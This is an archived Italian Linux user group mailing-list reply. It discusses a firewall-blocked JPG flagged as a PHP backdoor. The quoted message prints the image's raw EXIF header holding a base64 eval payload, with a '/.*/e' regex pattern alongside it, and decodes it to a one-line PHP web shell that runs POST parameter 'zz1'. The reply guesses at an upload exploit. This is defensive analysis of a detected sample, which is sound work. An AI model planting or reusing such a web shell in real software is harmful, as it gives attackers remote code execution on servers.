[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [linux_var] VIRUS JPG con codice PHP ?

To: talking@ml.linuxvar.it
Subject: Re: [linux_var] VIRUS JPG con codice PHP ?
From: Riccardo Macoratti <r.macoratti@gmx.co.uk>
Date: Wed, 11 Oct 2017 12:05:05 +0200
Delivered-to: diegor@tiscali.it
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ml.linuxvar.it; s=mail; t=1507716369; bh=IhtHIGBQ5RXUbwdJKWJCeEpY7HXwg8NrJmwmj+MduCc=; h=Date:From:To:In-Reply-To:References:Subject:List-Id: List-Unsubscribe:List-Archive:List-Post:List-Help:List-Subscribe: Reply-To; z=Date:=20Wed,=2011=20Oct=202017=2012:05:05=20+0200|From:=20Riccard o=20Macoratti=20<r.macoratti@gmx.co.uk>|To:=20talking@ml.linuxvar. it|In-Reply-To:=20<CAGod1SDqeFse-+WJmx3ooyEsH=3DSvYK_KB1KxVvSNOTFi UtvDAw@mail.gmail.com>|References:=20<CAGod1SDqeFse-+WJmx3ooyEsH=3 DSvYK_KB1KxVvSNOTFiUtvDAw@mail.gmail.com>|Subject:=20Re:=20[linux_ var]=20VIRUS=20JPG=20con=20codice=20PHP=20?|List-Id:=20linux_var=2 0-=20LUG=20di=20Varese=20e=20Provincia=20Mailing=20List=0D=0A=20<t alking.ml.linuxvar.it>|List-Unsubscribe:=20<http://ml.linuxvar.it/ cgi-bin/mailman/options/talking>,=0D=0A=20<mailto:talking-request@ ml.linuxvar.it?subject=3Dunsubscribe>|List-Archive:=20<http://ml.l inuxvar.it/pipermail/talking/>|List-Post:=20<mailto:talking@ml.lin uxvar.it>|List-Help:=20<mailto:talking-request@ml.linuxvar.it?subj ect=3Dhelp>|List-Subscribe:=20<http://ml.linuxvar.it/cgi-bin/mailm an/listinfo/talking>,=0D=0A=20<mailto:talking-request@ml.linuxvar. it?subject=3Dsubscribe>|Reply-To:=20linux_var=20-=20LUG=20di=20Var ese=20e=20Provincia=20Mailing=20List=0D=0A=20<talking@ml.linuxvar. it>; b=rbOIWMvvMZcreeH+UdrtZ9bb8KyqvnuYbA49LVSEEbrPjif7Ru5lap+r9jIaJDNoR p6iYNzlPgNGy2P9z2ebZoU9E2K2XhhidylFqIFmFJeAEBTAJaNbQ6mxq9XK+LuItP4 Ib0V4OBVSENdBH4I4EOMg1S7QQHoAww9cOnWWXEU=
In-reply-to: <CAGod1SDqeFse-+WJmx3ooyEsH=SvYK_KB1KxVvSNOTFiUtvDAw@mail.gmail.com>
List-archive: <http://ml.linuxvar.it/pipermail/talking/>
List-help: <mailto:talking-request@ml.linuxvar.it?subject=help>
List-id: linux_var - LUG di Varese e Provincia Mailing List <talking.ml.linuxvar.it>
List-post: <mailto:talking@ml.linuxvar.it>
List-subscribe: <http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>, <mailto:talking-request@ml.linuxvar.it?subject=subscribe>
List-unsubscribe: <http://ml.linuxvar.it/cgi-bin/mailman/options/talking>, <mailto:talking-request@ml.linuxvar.it?subject=unsubscribe>
References: <CAGod1SDqeFse-+WJmx3ooyEsH=SvYK_KB1KxVvSNOTFiUtvDAw@mail.gmail.com>
Reply-to: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>
Sender: "Talking" <talking-bounces@ml.linuxvar.it>

Ciao,

magari è parte dell'exploit per l'esecuzione di qualche shellcode.
Mi spiego meglio, magari è stata scoperta qualche vulnerabilità in Apache che facendo l'upload di qualche immagine si può sbordare in qualche buffer ed eseguire codice arbitrario.

È solo una supposizione, però.

Ciao,
Riccardo

On Wed, 11 Oct 2017 11:51:25 +0200
Giovanni Orlandi <orlangio@gmail.com> wrote:

> Ciao,
> 
> analizzando i log del firewall aziendale ho trovato bloccato il download
> sul PC
> di una immagine jpg (fortunatamente da un server esterno)
> 
> AntiVirus
> Profile Name default
> Virus/Botnet PHP/Agent.VD!tr.bdr
> <http://www.fortinet.com/ve?vn=PHP%2FAgent.VD%21tr.bdr>
> Virus ID 5380326
> Reference http://www.fortinet.com/ve?vn=PHP%2FAgent.VD%21tr.bdr
> Detection Type Virus
> Direction incoming
> Quarantine Skip File-was-not-quarantined.
> FortiSandbox Checksum
> 1552666804a9e84d3da6741fdf81d7b20206b15d46fd3e73fd9e51c6e822e706
> Submitted to FortiSandbox false
> Message File is infected.
> 
> Questo è il contenuto iniziale della jpg aperta in modo brutale con vim:
> 
> ÿØÿà^@^PJFIF^@^A^A^A^@H^@H^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e
> ^@eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));^@ÿÛ^@C^@^E^C^D^D^D^C^E^D^D
> 
> il base64_decode diventa:
> 
> *   if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}*
> 
> senz'altro pericoloso se dentro un file php sul server
> ma dentro una jpg ?
> 
> Non mi pare che lo scarico di quella immagine su di un PC (windows) possa
> portare alcun pericolo,
> semmai il suo upload su di un server, che però dovrebbe "eseguire" del
> codice php dentro una immagine jpg ?!?!?!
> 
> Qualcuno conosce il problema e mi può dare + informazioni ?
> Grazie,
> Giovanni
> 
> -- 
> -----------------------------------------------------------------------------------------
> Luca 18,5 : "Poiché questa vedova è così molesta le farò giustizia, perché
> non venga continuamente a importunarmi".
> Neemia 8,10 : "...questo giorno è consacrato al nostro Signore; non siate
> tristi; perché la gioia del Signore è la vostra forza".
> GSM 345.6050488 / 327.0547392 / 392.0698126 - Fax 06.62204735


-- 
Riccardo Macoratti
site: http://ricma.co
email: r {dot} macoratti {at} gmx {dot} co {dot} uk
_______________________________________________
Talking mailing list
Talking@ml.linuxvar.it
http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking

Follow-Ups:
- Re: [linux_var] VIRUS JPG con codice PHP ?
  - From: Giovanni Orlandi <orlangio@gmail.com>

References:
- [linux_var] VIRUS JPG con codice PHP ?
  - From: Giovanni Orlandi <orlangio@gmail.com>

Prev by Date: [linux_var] VIRUS JPG con codice PHP ?
Next by Date: Re: [linux_var] VIRUS JPG con codice PHP ?
Previous by thread: [linux_var] VIRUS JPG con codice PHP ?
Next by thread: Re: [linux_var] VIRUS JPG con codice PHP ?
Index(es):
- Date
- Thread